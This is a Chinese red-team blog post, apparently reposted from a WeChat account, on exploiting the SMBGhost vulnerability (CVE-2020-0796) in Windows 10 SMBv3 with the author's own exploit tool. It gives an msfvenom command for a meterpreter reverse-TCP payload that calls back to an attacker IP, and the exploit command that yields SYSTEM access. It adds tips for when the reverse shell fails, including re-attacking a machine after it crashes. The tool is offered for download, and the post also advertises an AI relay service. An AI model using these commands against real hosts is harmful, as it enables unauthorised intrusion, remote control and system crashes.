红队内网渗透实战:CVE-2020-0796SMBGhost利用(附EXP工具)

admin 2026-07-15 04:42:17 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文介绍CVE-2020-0796SMBGhost漏洞在红队内网渗透中的利用方法,提供基于开源项目二次开发的EXP工具,支持检测与利用。文章强调利用存在蓝屏风险,且扫描结果不一定准确,需谨慎使用。同时包含工具获取方式与实战步骤。 综合评分: 65 文章分类: 红队,内网渗透,漏洞分析,安全工具,软文广告


cover_image

红队内网渗透实战:CVE-2020-0796 SMBGhost 利用(附 EXP 工具)

原创

倍果科技 倍果科技

倍果科技

2026年7月10日 13:21 浙江

在小说阅读器读本章

去阅读

红队内网渗透实战:CVE-2020-0796 SMBGhost 利用(附 EXP 工具)

1. 工具获取方式

不想看长篇分析、复现,想直接拿工具开干的师傅,看这里。

关注公众号「倍果科技」,在后台回复 CVE-2020-0796 即可下载工具,.7z 压缩包解压密码为 beiguo

推荐一波自建自用 AI 中转站,codex 纯 Pro 号池满血运行 GPT 5.5/5.4,0.2 倍率高速稳定不注水,直达:http://47.103.62.125:3000/


2. 漏洞简介

CVE-2020-0796,常被称为 SMBGhost,是 Windows SMBv3.1.1 压缩机制中的远程代码执行漏洞。

常见影响范围:

Windows 10 1903
Windows 10 1909
SMBv3.1.1 compression

常见修复节点:

Windows 10 1903: 18362.720 及以上通常已修复
Windows 10 1909: 18363.720 及以上通常已修复

如果系统安装了以下补丁或后续累计更新,通常不再适合利用:

KB4551762
KB4549951
后续累计更新

3. 红队护网的典型场景

大家在护网或者红队项目中,是不是经常能用 fscan 扫描到类似下面的结果?

[!] SMB Ghost 10.43.20.104:445 CVE-2020-0796 漏洞存在
[!] SMB Ghost 10.43.20.182:445 CVE-2020-0796 漏洞存在
[!] SMB Ghost 10.43.20.59:445 CVE-2020-0796 漏洞存在
[!] SMB Ghost 10.43.21.228:445 CVE-2020-0796 漏洞存在
[!] SMB Ghost 10.43.20.102:445 CVE-2020-0796 漏洞存在
[!] SMB Ghost 10.43.20.66:445 CVE-2020-0796 漏洞存在
[!] SMB Ghost 10.43.20.187:445 CVE-2020-0796 漏洞存在

有研究过该漏洞的师傅肯定知道,如果使用 MSF 攻击的话,很大概率会导致目标蓝屏。


4. exp 工具

重要风险提示:CVE-2020-0796 漏洞利用过程存在一定概率导致目标系统蓝屏(BSOD),实战中利用需谨慎!

本工具基于开源项目 SMBGhost_AutomateExploitation 进行二次开发与功能优化,一定程度上提升了漏洞利用的稳定性与成功率。

工具由 Go 语言编写,编译后就是单个独立 exe,不用额外装运行环境。

内网渗透的时候直接拖进内网机器本地用就行,不用走多层代理转发,不会因为网络不稳影响漏洞利用的成功率。

关注公众号「倍果科技」,在后台回复 CVE-2020-0796 即可下载工具,.7z 压缩包解压密码为 beiguo


5. 参数说明

查看帮助:

smbghost_go.exe -h

使用参数:

| 参数 | 类型 | 说明 | | — | — | — | | -check | 开关参数(无需传值) | 检测目标是否存在 SMBGhost 漏洞 | | -e | 开关参数(无需传值) | 执行漏洞利用代码 | | -i | 字符串参数 | 指定目标 IP 地址 | | -p | 整数参数 | 指定目标 SMB 服务端口,默认值为 445 | | -shellcode | 字符串参数 | 指定攻击者生成的 shellcode 文件路径 | | -shellcode-hex | 字符串参数 | 传入十六进制格式或以\x转义格式编写的 shellcode payload | | -timeout | 整数参数 | 网络连接超时时间,单位为秒,默认值为 7 |


6. 实战利用

注意 payload 大小不可以超过 765 bytes,如果超过 765 bytes,会报错,类似:

payload too large for current KUSER_SHARED_DATA staging page: payload=900 max=765 combined=...

使用 msfvenom 生成适配目标的 payload,这里选 Windows x64 的 reverse_tcp,导出 raw 格式,方便后续给 exp 直接调用。

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.18.94.165 LPORT=4444 -f raw -o shell
.bin

payload 准备好之后,直接用 smbghost_go.exe 打 exp,指定目标 IP、-e 执行漏洞利用,加载刚才生成的 shell.bin 文件:

smbghost_go.exe -i 192.168.16.132 -e -shellcode shell.bin

攻击成功,目标上线至 MSF,成功获取到目标 SYSTEM 权限。

话不多说,直接上演示视频。

已关注

关注

重播 分享 赞

关闭

观看更多

更多

退出全屏

切换到竖屏全屏退出全屏

倍果科技已关注

分享视频

,时长01:44

0/0

00:00/01:44

切换到横屏模式

继续播放

[ ]

进度条,百分之0

播放

00:00

/

01:44

01:44

倍速

全屏

倍速播放中

0.5倍 0.75倍 1.0倍 1.5倍 2.0倍

超清 流畅

 您的浏览器不支持 video 标签

继续观看

红队内网渗透实战:CVE-2020-0796 SMBGhost 利用(附 EXP 工具)

观看更多

原创

,

红队内网渗透实战:CVE-2020-0796 SMBGhost 利用(附 EXP 工具)

倍果科技已关注

分享点赞在看

已同步到看一看写下你的评论

视频详情


7. 误区

刚接触这个漏洞的师傅,容易踩一个认知误区:只要目标系统版本在受影响范围内,就一定能打成功。

但实战中没这么简单。 哪怕目标属于 Windows 10 1909 的受影响版本,只要打上了 KB4549951 修复补丁,就打不了。 RCE 利用链根本建立不起来,攻击必然失败。

据我所知,目前没有哪个工具,能 100% 精准判定这个漏洞是否真实存在。 市面上的扫描器本质都是靠 SMB 协议版本、系统大版本号做识别。

没法可靠判断这些关键信息:

目标是否安装 KB4551762 修复补丁
目标是否安装了包含修复的后续累计补丁

所以就会出现一个很尴尬的结论:

-check 显示 vulnerable ≠ 一定能打成功

实战中这种场景特别常见:

445 端口开放
SMB 3.1.1 协议可用
扫描器提示疑似存在漏洞
但目标实际早已打补丁
EXP 执行直接失败

可能有人会说,那我登到目标上跑 systeminfo 一条条核对补丁,总该准了吧? emmmm,都拿到权限能登上去查补丁了,还费劲儿打 CVE-2020-0796 啊?

所以实战中,暂时还没什么稳定的利用方法,拿不准的目标,只能直接打一发试试水,成不成打一下就知道了。


8. 常见错误与原因

8.1 check 显示 vulnerable,但打不成功

原因:

check 只能检测 SMB 3.1.1/compression,不能确认补丁状态,检测逻辑本身就做不到 100% 精准。

8.2 shellcode 没反连

如果 exp 已经攻击成功了,但是 MSF 没有上线:

可以按这个思路排查:

① 先核对 payload 基础参数

确认payload(X64/X86)和目标系统匹配(别给 x64 机器生成 x86 的 payload)

检查 LHOST、LPORT 的地址和端口有没有填错

确认 payload 导出格式(推荐 raw 格式)

② 排查网络连通性

reverse_shell 能上线的前提,是目标可以出网,能访问到你的 MSF 监听地址。

如果目标不出网,直接换成 bind_shell 正向连接再试。

③ 确认目标是否被打蓝屏重启

前两项都排查没问题的话,大概率是利用过程中把目标打蓝屏,系统自动重启了。

这个洞本身就有一定概率触发蓝屏,系统会自动重启。不用急,等几分钟让目标重启完成,再重新打一次,大概率就能成。


——转载请保留出处。

往期推荐

AI赋能红队免杀!过主流杀软!(免杀工具获取方法在文中)

当杀软封死所有下载通道时 红队如何用系统自带组件杀出重围?


  • END –

欢迎关注公众号「倍果科技」,持续分享红队攻防与漏洞情报;建议设为星标,及时获取更新。

技术交流群请添加微信,备注「安全技术交流」。

免责声明:本文仅供学习研究,请勿用于非法用途,相关后果由使用者自行承担。



免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:倍果科技 倍果科技 倍果科技《红队内网渗透实战:CVE-2020-0796 SMBGhost 利用(附 EXP 工具)》

评论:0   参与:  0